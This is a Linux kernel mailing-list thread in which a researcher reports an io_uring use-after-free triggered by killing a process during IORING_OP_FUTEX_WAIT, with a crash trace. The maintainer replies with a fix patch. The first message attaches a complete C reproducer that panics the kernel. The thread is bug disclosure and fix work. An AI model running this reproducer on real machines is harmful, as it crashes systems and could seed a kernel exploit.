* use-after-free if killed while in IORING_OP_FUTEX_WAIT
@ 2025-06-04 13:58 rtm
2025-06-04 14:12 ` Jens Axboe
0 siblings, 1 reply; 3+ messages in thread
From: rtm @ 2025-06-04 13:58 UTC (permalink / raw)
To: Jens Axboe, Pavel Begunkov, io-uring
[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]
If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the iouring request still exists. When (a little
later in do_exit()) the iouring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.
I've attached a demo:
# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---
Robert Morris
rtm@mit.edu
[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>
int dirfd = -1;
int pfds[2];
int sock = -1;
//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//
#define QUEUE_DEPTH 1
#define BLOCK_SZ 1024
struct app_io_sq_ring {
unsigned *head;
unsigned *tail;
unsigned *ring_mask;
unsigned *ring_entries;
unsigned *flags;
unsigned *array;
};
struct app_io_cq_ring {
unsigned *head;
unsigned *tail;
unsigned *ring_mask;
unsigned *ring_entries;
struct io_uring_cqe *cqes;
};
struct submitter {
int ring_fd;
struct app_io_sq_ring sq_ring;
struct io_uring_sqe *sqes;
struct app_io_cq_ring cq_ring;
};
struct file_info {
off_t file_sz;
struct iovec iovecs[]; /* Referred by readv/writev */
};
int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
return (int) syscall(__NR_io_uring_setup, entries, p);
}
int io_uring_enter(int ring_fd, unsigned int to_submit,
unsigned int min_complete, unsigned int flags)
{
return (int) syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete,
flags, NULL, 0);
}
int app_setup_uring(struct submitter *s) {
struct app_io_sq_ring *sring = &s->sq_ring;
struct app_io_cq_ring *cring = &s->cq_ring;
struct io_uring_params p;
void *sq_ptr, *cq_ptr;
memset(&p, 0, sizeof(p));
s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
if (s->ring_fd < 0) {
perror("io_uring_setup");
return 1;
}
int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
if (p.features & IORING_FEAT_SINGLE_MMAP) {
if (cring_sz > sring_sz) {
sring_sz = cring_sz;
}
cring_sz = sring_sz;
}
sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_SQ_RING);
if (sq_ptr == MAP_FAILED) {
perror("mmap");
return 1;
}
if (p.features & IORING_FEAT_SINGLE_MMAP) {
cq_ptr = sq_ptr;
} else {
cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_CQ_RING);
if (cq_ptr == MAP_FAILED) {
perror("mmap");
return 1;
}
}
sring->head = sq_ptr + p.sq_off.head;
sring->tail = sq_ptr + p.sq_off.tail;
sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
sring->flags = sq_ptr + p.sq_off.flags;
sring->array = sq_ptr + p.sq_off.array;
s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_SQES);
if (s->sqes == MAP_FAILED) {
perror("mmap");
return 1;
}
cring->head = cq_ptr + p.cq_off.head;
cring->tail = cq_ptr + p.cq_off.tail;
cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
cring->cqes = cq_ptr + p.cq_off.cqes;
return 0;
}
int submit_to_sq(char *file_path, struct submitter *s) {
struct file_info *fi;
int file_fd = open(file_path, O_RDONLY);
if (file_fd < 0 ) {
perror("open");
return 1;
}
struct app_io_sq_ring *sring = &s->sq_ring;
unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;
off_t file_sz = 2;
off_t bytes_remaining = file_sz;
int blocks = (int) file_sz / BLOCK_SZ;
if (file_sz % BLOCK_SZ) blocks++;
fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
if (!fi) {
fprintf(stderr, "Unable to allocate memory\n");
return 1;
}
fi->file_sz = file_sz;
while (bytes_remaining) {
off_t bytes_to_read = bytes_remaining;
if (bytes_to_read > BLOCK_SZ)
bytes_to_read = BLOCK_SZ;
fi->iovecs[current_block].iov_len = bytes_to_read;
void *buf;
if( posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
perror("posix_memalign");
return 1;
}
fi->iovecs[current_block].iov_base = buf;
current_block++;
bytes_remaining -= bytes_to_read;
}
next_tail = tail = *sring->tail;
next_tail++;
index = tail & *s->sq_ring.ring_mask;
struct io_uring_sqe *sqe = &s->sqes[index];
sqe->flags = 0;
sqe->off = 0;
sring->array[index] = index;
tail = next_tail;
sqe->len = 0;
sqe->optval = 0x80000000;
static char buf[32];
memset(buf, 0xff, sizeof(buf));
*(long*)buf = 0xffffffff00000000;
sqe->addr = (__u64) buf;
sqe->opcode = IORING_OP_FUTEX_WAIT;
sqe->flags = 2;
sqe->fd = 130;
if(*sring->tail != tail) {
*sring->tail = tail;
}
int ret = io_uring_enter(s->ring_fd, 1,1,
IORING_ENTER_GETEVENTS);
if(ret < 0) {
perror("io_uring_enter");
return 1;
}
return 0;
}
int
main()
{
struct rlimit r;
r.rlim_cur = r.rlim_max = 0;
setrlimit(RLIMIT_CORE, &r);
unlink("z");
system("echo hi > z");
int pid = fork();
if(pid == 0){
struct submitter *s;
dirfd = open(".", 0);
socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
write(pfds[0], "a", 1);
write(pfds[1], "b", 1);
sock = socket(AF_INET, SOCK_DGRAM, 0);
s = malloc(sizeof(*s));
if (!s) {
perror("malloc");
exit(0);
}
memset(s, 0, sizeof(*s));
if(app_setup_uring(s)) {
fprintf(stderr, "Unable to setup uring!\n");
exit(0);
}
if(submit_to_sq("z", s)) {
fprintf(stderr, "Error reading file z\n");
exit(0);
}
printf("child exiting\n");
exit(0);
}
sleep(1);
printf("killing child\n");
kill(pid, 9);
usleep(200000);
}
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
2025-06-04 13:58 use-after-free if killed while in IORING_OP_FUTEX_WAIT rtm
@ 2025-06-04 14:12 ` Jens Axboe
2025-06-04 16:22 ` Jens Axboe
0 siblings, 1 reply; 3+ messages in thread
From: Jens Axboe @ 2025-06-04 14:12 UTC (permalink / raw)
To: rtm, Pavel Begunkov, io-uring
On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
> to exit_mm() causes the futex_private_hash to be freed, along with its
> buckets' locks, while the iouring request still exists. When (a little
> later in do_exit()) the iouring fd is fput(), the resulting
> futex_unqueue() tries to use the freed memory that
> req->async_data->lock_ptr points to.
>
> I've attached a demo:
>
> # cc uring46b.c
> # ./a.out
> killing child
> BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
> Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
> Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
> [6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
> Oops [#1]
> Modules linked in:
> CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE
> Hardware name: riscv-virtio,qemu (DT)
> Workqueue: iou_exit io_ring_exit_work
> epc : spin_dump+0x38/0x6e
> ra : spin_dump+0x30/0x6e
> epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
> ...
> status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
> [<ffffffff80003354>] spin_dump+0x38/0x6e
> [<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
> [<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
> [<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
> [<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
> [<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
> [<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
> [<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
> [<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
> [<ffffffff80057f0a>] process_one_work+0x132/0x2fe
> [<ffffffff8005888c>] worker_thread+0x21e/0x2fe
> [<ffffffff80060428>] kthread+0xe8/0x1ba
> [<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
> [<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
> Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04
> ---[ end trace 0000000000000000 ]---
> Kernel panic - not syncing: Fatal exception
> ---[ end Kernel panic - not syncing: Fatal exception ]---
Thanks, I'll take a look!
--
Jens Axboe
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
2025-06-04 14:12 ` Jens Axboe
@ 2025-06-04 16:22 ` Jens Axboe
0 siblings, 0 replies; 3+ messages in thread
From: Jens Axboe @ 2025-06-04 16:22 UTC (permalink / raw)
To: rtm, Pavel Begunkov, io-uring
On 6/4/25 8:12 AM, Jens Axboe wrote:
> On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
>> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
>> to exit_mm() causes the futex_private_hash to be freed, along with its
>> buckets' locks, while the iouring request still exists. When (a little
>> later in do_exit()) the iouring fd is fput(), the resulting
>> futex_unqueue() tries to use the freed memory that
>> req->async_data->lock_ptr points to.
>>
>> I've attached a demo:
>>
>> # cc uring46b.c
>> # ./a.out
>> killing child
>> BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
>> Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
>> Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
>> [6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
>> Oops [#1]
>> Modules linked in:
>> CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE
>> Hardware name: riscv-virtio,qemu (DT)
>> Workqueue: iou_exit io_ring_exit_work
>> epc : spin_dump+0x38/0x6e
>> ra : spin_dump+0x30/0x6e
>> epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
>> ...
>> status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
>> [<ffffffff80003354>] spin_dump+0x38/0x6e
>> [<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
>> [<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
>> [<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
>> [<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
>> [<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
>> [<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
>> [<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
>> [<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
>> [<ffffffff80057f0a>] process_one_work+0x132/0x2fe
>> [<ffffffff8005888c>] worker_thread+0x21e/0x2fe
>> [<ffffffff80060428>] kthread+0xe8/0x1ba
>> [<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
>> [<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
>> Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04
>> ---[ end trace 0000000000000000 ]---
>> Kernel panic - not syncing: Fatal exception
>> ---[ end Kernel panic - not syncing: Fatal exception ]---
>
> Thanks, I'll take a look!
I think this would be the least intrusive fix, and also avoid fiddling
with mmget() for the PRIVATE case. I'll write a test case for this and
send it out as a real patch.
diff --git a/io_uring/futex.c b/io_uring/futex.c
index 383e0d99ad27..246bfb862db9 100644
--- a/io_uring/futex.c
+++ b/io_uring/futex.c
@@ -148,6 +148,8 @@ int io_futex_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
!futex_validate_input(iof->futex_flags, iof->futex_mask))
return -EINVAL;
+ /* Mark as inflight, so file exit cancelation will find it */
+ io_req_track_inflight(req);
return 0;
}
@@ -194,6 +196,8 @@ int io_futexv_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
return ret;
}
+ /* Mark as inflight, so file exit cancelation will find it */
+ io_req_track_inflight(req);
iof->futexv_unqueued = 0;
req->flags |= REQ_F_ASYNC_DATA;
req->async_data = ifd;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index c7a9cecf528e..cf759c172083 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -408,7 +408,12 @@ static void io_clean_op(struct io_kiocb *req)
req->flags &= ~IO_REQ_CLEAN_FLAGS;
}
-static inline void io_req_track_inflight(struct io_kiocb *req)
+/*
+ * Mark the request as inflight, so that file cancelation will find it.
+ * Can be used if the file is an io_uring instance, or if the request itself
+ * relies on ->mm being alive for the duration of the request.
+ */
+inline void io_req_track_inflight(struct io_kiocb *req)
{
if (!(req->flags & REQ_F_INFLIGHT)) {
req->flags |= REQ_F_INFLIGHT;
diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
index 0ea7a435d1de..d59c12277d58 100644
--- a/io_uring/io_uring.h
+++ b/io_uring/io_uring.h
@@ -83,6 +83,7 @@ void io_add_aux_cqe(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags)
bool io_req_post_cqe(struct io_kiocb *req, s32 res, u32 cflags);
void __io_commit_cqring_flush(struct io_ring_ctx *ctx);
+void io_req_track_inflight(struct io_kiocb *req);
struct file *io_file_get_normal(struct io_kiocb *req, int fd);
struct file *io_file_get_fixed(struct io_kiocb *req, int fd,
unsigned issue_flags);
--
Jens Axboe
^ permalink raw reply related [flat|nested] 3+ messages in thread
end of thread, other threads:[~2025-06-04 16:23 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2025-06-04 13:58 use-after-free if killed while in IORING_OP_FUTEX_WAIT rtm
2025-06-04 14:12 ` Jens Axboe
2025-06-04 16:22 ` Jens Axboe
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox